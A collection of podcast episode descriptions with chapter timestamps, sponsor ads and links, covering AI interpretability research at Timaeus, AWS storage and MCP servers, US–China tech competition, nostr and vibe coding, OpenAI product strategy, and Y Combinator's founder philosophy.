Jesse Hoogland and Daniel Murfet, founders of Timaeus, introduce their mathematically rigorous approach to AI safety through "developmental interpretability" based on Singular Learning Theory. They explain how neural network loss landscapes are actually complex, jagged surfaces full of "singularities" where models can change internally without affecting external behavior—potentially masking dangerous misalignment. Using their Local Learning Coefficient measure, they've demonstrated the ability to identify critical phase changes during training in models up to 7 billion parameters, offering a complementary approach to mechanistic interpretability. This work aims to move beyond trial-and-error neural network training toward a more principled engineering discipline that could catch safety issues during training rather than after deployment. Sponsors: Oracle Cloud Infrastructure: Oracle Cloud Infrastructure (OCI) is the next-generation cloud that delivers better performance, faster speeds, and significantly lower costs, including up to 50% less for compute, 70% for storage, and 80% for networking. Run any workload, from infrastructure to AI, in a high-availability environment and try OCI for free with zero commitment at https://oracle.com/cognitive The AGNTCY (Cisco): The AGNTCY is an open-source collective dedicated to building the Internet of Agents, enabling AI agents to communicate and collaborate seamlessly across frameworks. Join a community of engineers focused on high-quality multi-agent software and support the initiative at https://agntcy.org/?utmcampaign=fy25q4agntcyamerpaid-mediaagntcy-cognitiverevolutionpodcast&utmchannel=podcast&utmsource=podcast NetSuite by Oracle: NetSuite by Oracle is the AI-powered business management suite trusted by over 41,000 businesses, offering a unified platform for accounting, financial management, inventory, and HR. Gain total visibility and control to make quick decisions and automate everyday tasks—download the free ebook, Navigating Global Trade: Three Insights for Leaders, at https://netsuite.com/cognitive PRODUCED BY: https://aipodcast.ing CHAPTERS: (00:00) About the Episode (04:44) Introduction and Background (06:17) Timaeus Origins and Philosophy (09:13) Mathematical Background and SLT (12:27) Developmental Interpretability Approach (Part 1) (16:09) Sponsors: Oracle Cloud Infrastructure | The AGNTCY (Cisco) (18:09) Developmental Interpretability Approach (Part 2) (19:24) Proto-Paradigm and SAEs (24:37) Understanding Generalization (30:15) Central Dogma Framework (Part 1) (32:13) Sponsor: NetSuite by Oracle (33:37) Central Dogma Framework (Part 2) (34:35) Loss Landscape Geometry (40:41) Degeneracies and Evidence (47:25) Structure and Data Connection (55:36) Essential Dynamics and Algorithms (01:00:53) Implicit Regularization and Complexity (01:07:19) Double Descent and Scaling (01:09:55) Big Picture Applications (01:17:17) Reward Hacking and Risks (01:25:19) Future Training Vision (01:32:01) Scaling and Next Steps (01:36:43) Outro
Explore FSx for Lustre's new intelligent storage tiering that delivers cost savings and unlimited scalability for file storage in the cloud. Plus, discover how the new Model Context Protocol (MCP) servers are revolutionizing AI-assisted development across ECS, EKS, and serverless platforms with real-time contextual responses and automated resource management. 00:00 - Intro, 00:52 - Introduction new storage class, 03:43 - MCP Servers, 07:18 - Analytics, 09:34 - Application Integration, 15:52 - Business Applications, 16:21 - Cloud Financial Management, 17:44 - Compute, 20:44 - Containers, 21:31 - Databases, 24:25 - Developer Tools, 25:42 - End User Computing, 25:58 - Gaming, 26:34 - Management and Governance, 28:35 - Marketplace, 28:51 - Media Services, 29:29 - Migration and Transfer, 30:01 - Networking and Content Delivery, 34:01 - Security Identity and Compliance, 34:43 - Serverless, 35:06 - Storage, 36:55 - Wrap up Show Notes: https://dqkop6u6q45rj.cloudfront.net/shownotes-20250613-185437.html
Chinese exports of rare earths, a critical component in manufacturing high-end tech products, emerged as a key sticking point in this week's trade talks between Beijing and Washington. Underpinning all of this is the race for artificial intelligence supremacy. Who is winning this competition? Who is best placed to control the supply chains of all the components that go into the top chips and AI models? Jared Cohen and George Lee, the co-heads of the Goldman Sachs Global Institute, join FP Live.
Note: This discussion is part of a series of episodes brought to you by the Goldman Sachs Global Institute.
Jared Cohen: The AI Economy's Massive Vulnerability
Rishi Iyengar & Lili Pike: Is It Too Late to Slow China's AI Development?
Vivek Chilukuri: How the United States Can Win the Global Tech Race
Brought to you by: nordvpn.com/fplive (Exclusive NordVPN Deal: Try it risk-free now with a 30-day money-back guarantee)
Learn more about your ad choices. Visit megaphone.fm/adchoices
Alex Gleason was one of the main architects behind Donald Trump's Truth Social. Now he focuses on the intersection of nostr, ai, and bitcoin. We dive deep into how he thinks about the future of nostr and vibe coding: using ai tools to rapidly prototype and ship apps with simple text based prompts.
Alex on Nostr: https://primal.net/p/nprofile1qqsqgc0uhmxycvm5gwvn944c7yfxnnxm0nyh8tt62zhrvtd3xkj8fhggpt7fy
Stacks: https://getstacks.dev/
EPISODE: 164
BLOCK: 901101
PRICE: 957 sats per dollar
(00:00:02) Alex's Presentation at the Oslo Freedom Forum
(00:01:31) Challenges and Opportunities in Decentralized Platforms
(00:02:31) The Role of AI in Decentralized Social Media
(00:05:00) Happy Bitcoin Friday
(00:06:09) Guest Introduction: Alex Gleason
(00:07:02) Truth Social
(00:10:35) Challenges of Centralized vs Decentralized Platforms
(00:14:01) Bridging Platforms
(00:19:13) Limitations and Potential of Mastodon and Bluesky
(00:24:08) The Future of AI and Vibe Coding
(00:31:08) Empowering Developers with AI
(00:38:09) The Impact of AI on Software Development
(00:47:02) Building with Getstacks.dev
(00:53:04) Impact of AI Models
(01:02:01) Monetization and Future of AI Development
(01:14:07) Open Source Development in an AI World
(01:22:17) Data Preservation Using Nostr
Video: https://primal.net/e/nevent1qqs96kxmxc7mufgt6n2rxpphg8ptyx2kl47a7rj389jrwmvjy6rhuhgmfel87
support dispatch: https://citadeldispatch.com/donate
nostr live chat: https://citadeldispatch.com/stream
odell nostr account: https://primal.net/odell
dispatch nostr account: https://primal.net/citadel
youtube: https://www.youtube.com/@CitadelDispatch
podcast: https://serve.podhome.fm/CitadelDispatch
stream sats to the show: https://www.fountain.fm/
rock the badge: https://citadeldispatch.com/shop
join the chat: https://citadeldispatch.com/chat
learn more about me: https://odell.xyz
This week, I'm speaking with Kevin Weil, Chief Product Officer at OpenAI, who is steering product development at what might be the world's most important company right now.
We talk about:
(00:00) Episode trailer
(01:37) OpenAI's latest launches
(03:43) What it's like being CPO of OpenAI
(04:34) How AI will reshape our lives
(07:23) How young people use AI differently
(09:29) Addressing fears about AI
(11:47) Kevin's "Oh sh!t" moment
(14:11) Why have so many models within ChatGPT?
(18:19) The unpredictability of AI product progress
(24:47) Understanding model “evals”
(27:21) How important is prompt engineering?
(29:18) Defining “AI agent”
(37:00) Why OpenAI views coding as a prime target use-case
(41:24) The “next model test” for any AI startup
(46:06) Jony Ive's role at OpenAI
(47:50) OpenAI's hardware vision
(50:41) Quickfire questions
(52:43) When will we get AGI?
Kevin's links:
LinkedIn: https://www.linkedin.com/in/kevinweil/
Twitter/X: @kevinweil
Azeem's links:
Substack: https://www.exponentialview.co/
Website: https://www.azeemazhar.com/
LinkedIn: https://www.linkedin.com/in/azhar
Twitter/X: https://x.com/azeem
Our new show:
This was originally recorded for "Friday with Azeem Azhar", a new show that takes place every Friday at 9am PT and 12pm ET. You can tune in through Exponential View on Substack.
Produced by supermix.io and EPIIPLUS1 Ltd.
Most accelerators fund ideas. Y Combinator funds founders—and transforms them. With a 1% acceptance rate and alumni behind 60% of the past decade's unicorns, YC knows what separates the founders who break through from those who burn out. It's not the flashiest résumé or the boldest pitch but something President Garry Tan says is far rarer: earnestness. In this conversation, Garry reveals why this is the key to success, and how it can make or break a startup. We also dive into how AI is reshaping the whole landscape of venture capital and what the future might look like when everyone has intelligence on tap. If you care about innovation, agency, or the future of work, don't miss this episode. Approximate timestamps: Subject to variation due to dynamically inserted ads. (00:02:39) The Success of Y Combinator (00:04:25) The Y Combinator Program (00:08:25) The Application Process (00:09:58) The Interview Process (00:16:16) The Challenge of Early Stage Investment (00:22:53) The Role of San Francisco in Innovation (00:28:32) The Ideal Founder (00:36:27) The Importance of Earnestness (00:42:17) The Changing Landscape of AI Companies (00:45:26) The Impact of Cloud Computing (00:50:11) Dysfunction with Silicon Valley (00:52:24) Forecast for the Tech Market (00:54:40) The Regulation of AI (00:55:56) The Need for Agency in Education (01:01:40) AI in Biotech and Manufacturing (01:07:24) The Issue of Data Access and The Legal Aspects of AI Outputs (01:13:34) The Role of Meta in AI Development (01:28:07) The Potential of AI in Decision Making (01:40:33) Defining AGI (01:42:03) The Use of AI and Prompting (01:47:09) AI Model Reasoning (01:49:48) The Competitive Advantage in AI (01:52:42) Investing in Big Tech Companies (01:55:47) The Role of Microsoft and Meta in AI (01:57:00) Learning from MrBeast: YouTube Channel Optimization (02:05:58) The Perception of Founders (02:08:23) The Reality of Startup Success Rates (02:09:34) The Impact of OpenAI (02:11:46) The Golden Age of Building Newsletter - The Brain Food newsletter delivers actionable insights and thoughtful ideas every Sunday. It takes 5 minutes to read, and it's completely free. Learn more and sign up at fs.blog/newsletter Upgrade — If you want to hear my thoughts and reflections at the end of the episode, join our membership: fs.blog/membership and get your own private feed. Watch on YouTube: @tkppodcast Learn more about your ad choices. Visit megaphone.fm/adchoices